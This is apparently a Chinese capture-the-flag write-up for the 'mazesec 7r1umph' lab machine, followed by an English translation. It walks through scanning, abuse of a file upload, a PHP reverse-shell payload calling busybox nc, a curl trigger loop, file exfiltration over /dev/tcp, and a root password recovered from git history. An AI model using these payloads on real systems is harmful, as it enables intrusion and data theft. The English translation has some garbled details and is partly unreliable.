mazesec 7r1umph

信息收集

# Nmap 7.95 scan initiated Sat Dec 13 04:39:06 2025 as: /usr/lib/nmap/nmap --privileged -sV -T4 -v -oN 192.168.110.201.nmap 192.168.110.201
Nmap scan report for 7r1umph.lan (192.168.110.201)
Host is up (0.00021s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
MAC Address: 08:00:27:1A:68:BD (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec 13 04:39:17 2025 -- 1 IP address (1 host up) scanned in 11.86 seconds

# Dirsearch started Sat Dec 13 04:42:00 2025 as: /usr/lib/python3/dist-packages/dirsearch/dirsearch.py -u http://192.168.110.201/ -e zip,tar.gz,rar,bak,old,py,git,txt,php,html

403   280B   http://192.168.110.201/.ht_wsr.txt
403   280B   http://192.168.110.201/.htaccess.bak1
403   280B   http://192.168.110.201/.htaccess.sample
403   280B   http://192.168.110.201/.htaccess.save
403   280B   http://192.168.110.201/.htaccess.orig
403   280B   http://192.168.110.201/.htaccess_extra
403   280B   http://192.168.110.201/.htaccess_orig
403   280B   http://192.168.110.201/.htaccessOLD
403   280B   http://192.168.110.201/.htaccess_sc
403   280B   http://192.168.110.201/.htaccessBAK
403   280B   http://192.168.110.201/.htaccessOLD2
403   280B   http://192.168.110.201/.htm
403   280B   http://192.168.110.201/.html
403   280B   http://192.168.110.201/.htpasswds
403   280B   http://192.168.110.201/.httr-oauth
403   280B   http://192.168.110.201/.htpasswd_test
403   280B   http://192.168.110.201/.php
200   841B   http://192.168.110.201/index.php   # 是一个文件上传网站
200   841B   http://192.168.110.201/index.php/login/ # 跟上面一样
200    23KB  http://192.168.110.201/info.php  # phpinfo()页面
403   280B   http://192.168.110.201/server-status
403   280B   http://192.168.110.201/server-status/
301   316B   http://192.168.110.201/tmp    -> REDIRECTS TO: http://192.168.110.201/tmp/ #无任何东西
200   405B   http://192.168.110.201/tmp/
301   319B   http://192.168.110.201/upload    -> REDIRECTS TO: http://192.168.110.201/upload/  #上传文件到此处
200   407B   http://192.168.110.201/upload/

# 分析http://192.168.110.201/info.php
# 禁用函数不包括exec(),popen()
disable_functions：system, passthru, shell_exec, proc_open, pcntl_exec, dl
# LFI to RCE 的条件
session.upload_progress.enabled = On
session.upload_progress.cleanup = On # 可以寻找一下LFI
# 信息泄露
DOCUMENT_ROOT: /var/www/html
SCRIPT_FILENAME: /var/www/html/info.php

漏洞分析

http://192.168.110.201/index.php上传的文件都会在后面添加一个.dsz

tmp是缓存文件，猜想：当上传文件到服务器时，服务器将文件加后缀名.dsz。而这些文件可能被存储在tmp中

image 152.png

验证了猜想

利用

<?php 
exec("busybox nc 192.168.110.141 4444 -e bash");
?>

启动

while true; do curl http://192.168.110.201/tmp/shell.php; sleep 1;  done

上传文件shell.php

ls /home 发现welcome用户

进入后在/opt找到两个文件guess二进制文件，yeyeye.png图片

# 在自己主机监听
nc -lvnp 5555 > yeyeye.png

# 在目标连接
cat yeyeye.png > /dev/tcp/192.168.110.141/5555

image 153.png

yeyeye.png

通过谷歌搜索（将图片上传谷歌），得到此地址。得到密码：welcome:yecongdong

进入welcome得到的是tmux环境

权限提升

welcome@7r1umph:~$ ls -la
total 32
drwx------ 3 welcome welcome 4096 Apr 12  2025 .
drwxr-xr-x 3 root    root    4096 Apr 11  2025 ..
lrwxrwxrwx 1 root    root       9 Apr 11  2025 .bash_history -> /dev/null
-rw-r--r-- 1 welcome welcome  220 Apr 11  2025 .bash_logout
-rw-r--r-- 1 welcome welcome 3526 Apr 11  2025 .bashrc
-rw-r--r-- 1 welcome welcome   42 Apr 12  2025 .gitconfig
-rw-r--r-- 1 welcome welcome  807 Apr 11  2025 .profile
drwxr-xr-x 3 root    root    4096 Apr 12  2025 RegView
-rw-r--r-- 1 root    root      44 Apr 12  2025 user.txt
lrwxrwxrwx 1 root    root       9 Apr 12  2025 .viminfo -> /dev/null
welcome@7r1umph:~$ cd RegView/
welcome@7r1umph:~/RegView$ ls -la
total 476
drwxr-xr-x 3 root    root      4096 Apr 12  2025 .
drwx------ 3 welcome welcome   4096 Apr 12  2025 ..
drwxr-xr-x 8 root    root      4096 Apr 12  2025 .git   # 发现.git
-rw-r--r-- 1 root    root       289 Dec  3  2024 poc.txt
-rw-r--r-- 1 root    root       936 Apr 12  2025 README.md
-rwxr-xr-x 1 root    root      3911 Apr 12  2025 RegView.sh
-rw-r--r-- 1 root    root    457296 Dec  3  2024 run.jpg
-rw-r--r-- 1 root    root      2095 Dec  3  2024 source.txt

$ git log -P
commit acd806aad21acb61112252234c7707bc8a74dd3c (HEAD -> main)
Author: bamuwe <bamuwe@qq.com>
Date:   Sat Apr 12 01:33:50 2025 -0400

    fix bug

diff --git a/source2.txt b/source2.txt
deleted file mode 100644
index fca9fc6..0000000
--- a/source2.txt
+++ /dev/null
@@ -1 +0,0 @@
-root:ff855ad811c79e5fba458a575fac5b83

发现root的密码ff855ad811c79e5fba458a575fac5b83

welcome@7r1umph:~/RegView$ su root
Password:
root@7r1umph:/home/welcome/RegView# cat /root/root.txt
flag{root-ff855ad811c79e5fba458a575fac5b83}

经验教训

文件可控：我们可以上传任意内容，但后缀强制加 .dsz。
路径可控：我们通过文件名穿越失败，确认文件死死地待在 /upload/ 目录下。
LFI 失踪：常规和非常规参数 Fuzz 均未找到包含点。
解析逻辑暴露：shell.php.svg.dsz 被当做 XML 解析报错，test1.png.dsz 被当做图片解析报错。

mazesec 7r1umph

Information Gathering

# Nmap 7.95 scan started on Saturday, December 13, 2025, at 04:39:06, as follows:
# /usr/lib/nmap/nmap --privileged -sV -T4 -v -oN 192.168.110.201.nmap 192.168.110.201
Nmap scan report for 7r1umph.lan (192.168.110.201)
The host is up (latency: 0.00021 seconds).
998 closed TCP ports were not displayed (they were reset).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
MAC Address: 08:00:27:1A:68:BD (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Data files were read from: /usr/share/nmap
Service detection has been completed. Please report any incorrect results at: https://nmap.org/submit/ .
# Nmap completed on Saturday, December 13, 2025, at 04:39:17 — 1 IP address (1 host up) was scanned in 11.86 seconds

Dirsearch started on Saturday, December 13, 2025, at 04:42:00, with the following command:

`/usr/lib/python3/dist-packages/dirsearch/dirsearch.py -u http://192.168.110.201/ -e zip,tar.gz,rar,bak,old,py,git,txt,php,html`

Directory contents:

403 280B http://192.168.110.201/.ht_wsr.txt
403 280B http://192.168.110.201/.htaccess.bak1
403 280B http://192.168.110.201/.htaccess.sample
403 280B http://192.168.110.201/.htaccess.save
403 280B http://192.168.110.201/.htaccess.orig
403 280B http://192.168.110.201/.htaccess_extra
403 280B http://192.168.110.201/.htaccessOLD
403 280B http://168.110.201/.htaccess_sc
403 280B http://192.168.110.201/.htaccessBAK
403 280B http://192.168.110.201/.htaccessOLD2
403 280B http://192.168.110.201/.htm
403 280B http://192.168.110.201/.html
403 280B http://192.168.110.201/.htpasswds
403 280B http://192.168.110.201/.httr-oauth
403 280B http://192.168.110.201/.htpasswd_test
403 280B http://192.168.110.201/.php
200 841B http://192.168.110.201/index.php # A file upload website
200 841B http://192.168.110.201/index.php/login # Similar to the previous file
200 23KB http://192.168.110.201/info.php # A phpinfo() page
403 280B http://192.168.110.201/server-status
403 280B http://192.168.110.201/server-status/
301 316B http://192.168.110.201/tmp # Redirects to http://192.168.110.201/tmp/ (empty directory)
200 405B http://192.168.110.201/tmp/
301 319B http://192.168.110.201/upload # Redirects to http://192.168.110.201/upload (file upload page)
407B http://192.168.110.201/upload/

Analysis of `http://192.168.110.201/info.php`:

Functions that are disabled (do not include exec(), popen(), etc.):
system, passthru, shell_exec, proc_open, pcntl_exec, dl
Conditions for exploiting LFI (Local File Inclusion) to RCE (Remote Code Execution):
session.upload_progress.enabled = On
session.upload_progress_cleanup = On (This could potentially be used for LFI attacks)
Information leakage:
DOCUMENT_ROOT: /var/www/html
SCRIPT_FILENAME: /var/www/html/info.php

Vulnerability Analysis

All files uploaded to http://192.168.110.201/index.php are appended with the .dsz extension.

tmp is a cache directory; it is speculated that when a file is uploaded to the server, the server adds the .dsz extension to the file name, and these files are then stored in tmp.

image 152.png

This hypothesis was confirmed.

Exploitation

<?php 
exec("busybox nc 192.168.110.141 4444 -e bash");
?>

To initiate the exploitation process:

while true; do curl http://192.168.110.201/tmp/shell.php; sleep 1; done

Upload the file shell.php.

Executing ls /home reveals the welcome user.

Inside the welcome user’s home directory, two files are found: a binary file named guess and an image file named yeyeye.png.

# Listen on the local host
nc -lvnp 5555 > yeyeye.png

# Connect to the target host
cat yeyeye.png > /dev/tcp/192.168.110.141/5555

image 153.png

The image yeyeye.png was uploaded to Google Cache (https://geocachen.be/geocaching/geocache-puzzels-oplossen/dorabella-cipher/), and the password obtained from it is welcome:yecongdong.

Entering the welcome user’s account reveals a tmux environment.

Privilege Escalation

welcome@7r1umph:~$ ls -la
total 32
drwx------ 3 welcome welcome 4096 Apr 12  2025 .
drwxr-xr-x 3 root    root    4096 Apr 11  2025 ..
lrwxrwxrwx 1 root    root       9 Apr 11  2025 .bash_history -> /dev/null
-rw-r--r-- 1 welcome welcome  220 Apr 11  2025 .bashlogout
-rw-r--r-- 1 welcome welcome 3526 Apr 11  2025 .bashrc
-rw-r--r-- 1 welcome welcome   42 Apr 12  2025 .gitconfig
-rw-r--r-- 1 welcome welcome  807 Apr 11  2025 .profile
drwxr-xr-x 3 root    root    4096 Apr 12  2025 RegView
-rw-r--r-- 1 root    root      44 Apr 12  2025 user.txt
lrwxrwxrwx 1 root    root       9 Apr 12  2025 .viminfo -> /dev/null
welcome@7r1umph:~$ cd RegView/
welcome@7r1umph:~/RegView$ ls -la
total 476
drwxr-xr-x 3 root    root      4096 Apr 12  2025 .
drwx------ 3 welcome welcome   4096 Apr 12  2025 ..
drwxr-xr-x 8 root    root      4096 Apr 12  2025 .git   # Found the.git file
-rw-r--r-- 1 root    root       289 Dec  3  2024 poc.txt
-rw-r--r-- 1 root    root       936 Apr 12  2025 README.md
-rwxr-xr-x 1 root    root      3911 Apr 12  2025 RegView.sh
-rw-r--r-- 1 root    root    457296 Dec  3  2024 run.jpg
-rw-r--r-- 1 root    root      2095 Dec  3  2024 source.txt

$ git log -P
commit acd806aad21acb61112252234c7707bc8a74dd3c (HEAD -> main)
Author: bamuwe <bamuwe@qq.com>
Date:   Sat Apr 12 01:33:50 2025 -0400

    Fix a bug

diff --git a/source2.txt b/source2.txt
Deleted file: mode 100644
Index: fca9fc6..0000000
--- a/source2.txt
+++ /dev/null
@@ -1 +0,0 @@
-root:ff855ad811c79e5fba458a575fac5b83

The root password is ff855ad811c79e5fba458a575fac5b83.

welcome@7r1umph:~/RegView$ su root
Password:
root@7r1umph:/home/welcome/RegView# cat /root/root.txt
flag{root-ff855ad811c79e5fba458a575fac5b83}

Lessons Learned

File Control: We were able to upload any content, but the file suffix was forcibly changed to .dsz.
Path Control: Our attempts to manipulate file names failed, confirming that the files remained in the /upload/ directory.
LFI (Local File Inclusion) Vulnerability: Neither conventional nor unconventional Fuzz testing methods detected any exploitable code containing dots.
Exposed Parsing Logic: The file shell.php.svg.dsz was parsed as XML, and test1.png.dsz was parsed as an image.

mazesec-7r1umph

mazesec-7r1umph

mazesec 7r1umph

信息收集

漏洞分析

利用

权限提升

经验教训

mazesec 7r1umph

Information Gathering

Dirsearch started on Saturday, December 13, 2025, at 04:42:00, with the following command:

`/usr/lib/python3/dist-packages/dirsearch/dirsearch.py -u http://192.168.110.201/ -e zip,tar.gz,rar,bak,old,py,git,txt,php,html`

Directory contents:

Analysis of `http://192.168.110.201/info.php`:

Vulnerability Analysis

Exploitation

Privilege Escalation

Lessons Learned